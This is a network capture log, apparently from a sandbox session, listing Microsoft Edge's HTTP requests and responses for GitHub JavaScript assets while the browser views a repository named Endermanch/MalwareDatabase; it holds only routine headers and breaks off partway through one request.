GEThttps://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_morphdom_dist_morphdom-e-7c534c-a4a1922eb55f.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_morphdom_dist_morphdom-e-7c534c-a4a1922eb55f.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 15 Jan 2025 21:47:51 GMT
etag: "0x8DD35AE42915564"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 796202
x-served-by: cache-iad-kcgs7200062-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 4, 1230
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 0b77b9a0595b46be35b5d8949e590f6c2db66c61
content-length: 4972
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-e3cbe28f1638.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-e3cbe28f1638.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Mon, 27 Jan 2025 16:07:07 GMT
etag: "0x8DD3EECA5CD9FF1"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 199798
x-served-by: cache-iad-kcgs7200032-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 32, 1428
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: a9d4213b2dc5136f8e63e7e2c40f8d73bb6b3139
content-length: 7935
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-893f9f-6cf3320416b8.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-893f9f-6cf3320416b8.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 08 Aug 2024 18:12:13 GMT
etag: "0x8DCB7D5A12F3F7D"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 802249
x-served-by: cache-iad-kcgs7200153-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 14906, 1143
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 3ffa34d8736d8e30ca5cada0c10584d263534000
content-length: 3816
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-e3180fe3bcb3.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/vendors-node_modules_color-convert_index_js-e3180fe3bcb3.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 05 Dec 2024 15:49:17 GMT
etag: "0x8DD1544602F3D8E"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 1343587
x-served-by: cache-iad-kiad7000100-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 40, 1189
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: a312c9aebb1d61c5b7bdbdba173cdbbc1b0910a4
content-length: 19397
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-node_modules_github_session-resume_-69cfcc-833249ee3034.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/vendors-node_modules_github_quote-selection_dist_index_js-node_modules_github_session-resume_-69cfcc-833249ee3034.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 12 Nov 2024 00:52:40 GMT
etag: "0x8DD02B44F3EF886"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 823973
x-served-by: cache-iad-kcgs7200145-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 455, 1163
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: e8eb3cd19070be8405473ab2171c202a6f56a2ab
content-length: 4851
-
GEThttps://github.githubassets.com/assets/ui_packages_updatable-content_updatable-content_ts-0d1db422e5cc.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/ui_packages_updatable-content_updatable-content_ts-0d1db422e5cc.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 14 Jan 2025 20:31:16 GMT
etag: "0x8DD34DA65855F67"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 1207987
x-served-by: cache-iad-kiad7000155-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 27, 1205
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 04b38d18ff4cd8b863ea98525f0ba670cddcc961
content-length: 3027
-
GEThttps://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_sso_ts-ui_packages-900dde-cab6164e492b.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_sso_ts-ui_packages-900dde-cab6164e492b.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Mon, 25 Nov 2024 14:39:53 GMT
etag: "0x8DD0D5F064BBD59"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 202652
x-served-by: cache-iad-kiad7000150-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 1343, 533
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 5630efd51576ae8a0c243ec369d0a10b88f5d05b
content-length: 4975
-
GEThttps://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-83e480198629.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/app_assets_modules_github_sticky-scroll-into-view_ts-83e480198629.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 14 Jan 2025 20:30:55 GMT
etag: "0x8DD34DA58F700EC"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 1207982
x-served-by: cache-iad-kjyo7100158-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 20, 729
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 6691625f74f94a4d9bbb3a3c72c42a67ed907c64
content-length: 4984
-
GEThttps://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-87a4ae-153d9024e8bd.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-87a4ae-153d9024e8bd.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 14 Jan 2025 20:31:02 GMT
etag: "0x8DD34DA5CE41EE0"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 1207981
x-served-by: cache-iad-kcgs7200023-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 26, 578
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 1e8f6b793d219c51df8716c183a681fdf79af5b3
content-length: 5491
-
GEThttps://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-47714e1f448d.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-47714e1f448d.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 05 Dec 2024 15:49:16 GMT
etag: "0x8DD15445FC3AE69"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 1443369
x-served-by: cache-iad-kcgs7200159-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 653, 650
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: f22378e9f1b79f9c1a5ebb920589b4a82a65c93b
content-length: 6126
-
Remote address:185.199.109.154:443RequestGET /assets/behaviors-ccce079e8d78.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 14 Jan 2025 20:30:55 GMT
etag: "0x8DD34DA58F7C360"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 1207986
x-served-by: cache-iad-kcgs7200126-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 27, 1198
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: d633be686e35ced21dede22f47746676ea4e1320
content-length: 3362
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-f6223d90c7ba.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-f6223d90c7ba.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 14 Jan 2025 20:31:28 GMT
etag: "0x8DD34DA6C42C0A1"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 1207986
x-served-by: cache-iad-kjyo7100031-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 27, 1194
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 7055999130c4f5b89d3edca0e1cf30a43447c346
content-length: 3405
-
Remote address:185.199.109.154:443RequestGET /assets/notifications-global-7556bd523830.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 14 Jan 2025 20:30:55 GMT
etag: "0x8DD34DA5901CA43"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 641784
x-served-by: cache-iad-kiad7000107-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 27, 1201
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 5d7ea30d8f9150233806cd583a756aebc66b898e
content-length: 4457
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_template-parts_lib_index_js-96453a51f920.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_template-parts_lib_index_js-96453a51f920.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 29 Jan 2025 20:06:17 GMT
etag: "0x8DD40A064088E19"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 78070
x-served-by: cache-iad-kiad7000141-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 31, 1988
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: d9305dadd249d660e2e34d85af09654080c165a1
content-length: 6650
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-70450e-eecf0d50276f.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-70450e-eecf0d50276f.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 29 Jan 2025 20:06:17 GMT
etag: "0x8DD40A064000C2F"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 78071
x-served-by: cache-iad-kcgs7200124-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 32, 2004
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 8e27d4f5b2960a0e82760b14e5400b2411bb4660
content-length: 3115
-
GEThttps://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-df71139e3900.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/app_assets_modules_github_ref-selector_ts-df71139e3900.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 08 Aug 2024 18:12:15 GMT
etag: "0x8DCB7D5A25F63A1"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 1408013
x-served-by: cache-iad-kiad7000040-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 95, 687
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 9c12e72b2afc6ee0f16bb560c30c49dd5041c378
content-length: 3888
-
Remote address:185.199.109.154:443RequestGET /assets/codespaces-6b393e6a52d6.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 30 Jan 2025 16:05:36 GMT
etag: "0x8DD4147EEDC643F"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 18594
x-served-by: cache-iad-kiad7000044-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 30, 599
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 07f9a704ea33ad7c11f0b67ac0a85fd9e4d8a1ed
content-length: 60294
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-3eebbd-0763620ad7bf.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-3eebbd-0763620ad7bf.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 19 Nov 2024 17:47:26 GMT
etag: "0x8DD08C23B22EDF8"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 811018
x-served-by: cache-iad-kiad7000141-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 72, 1136
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 795dc2f2213f2b2ef103dbc5abaae45ed9d6a852
content-length: 4143
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_delegated-events_di-e161aa-9d41fb1b6c9e.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_delegated-events_di-e161aa-9d41fb1b6c9e.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Sat, 16 Nov 2024 19:35:21 GMT
etag: "0x8DD0675CF86BAD9"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 2710671
x-served-by: cache-iad-kiad7000054-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 4847, 629
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 44ebef85742ea88ced07d72c137d1f2009d5f11a
content-length: 4341
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_remote--3c9c82-7238cfcdaa51.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_remote--3c9c82-7238cfcdaa51.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
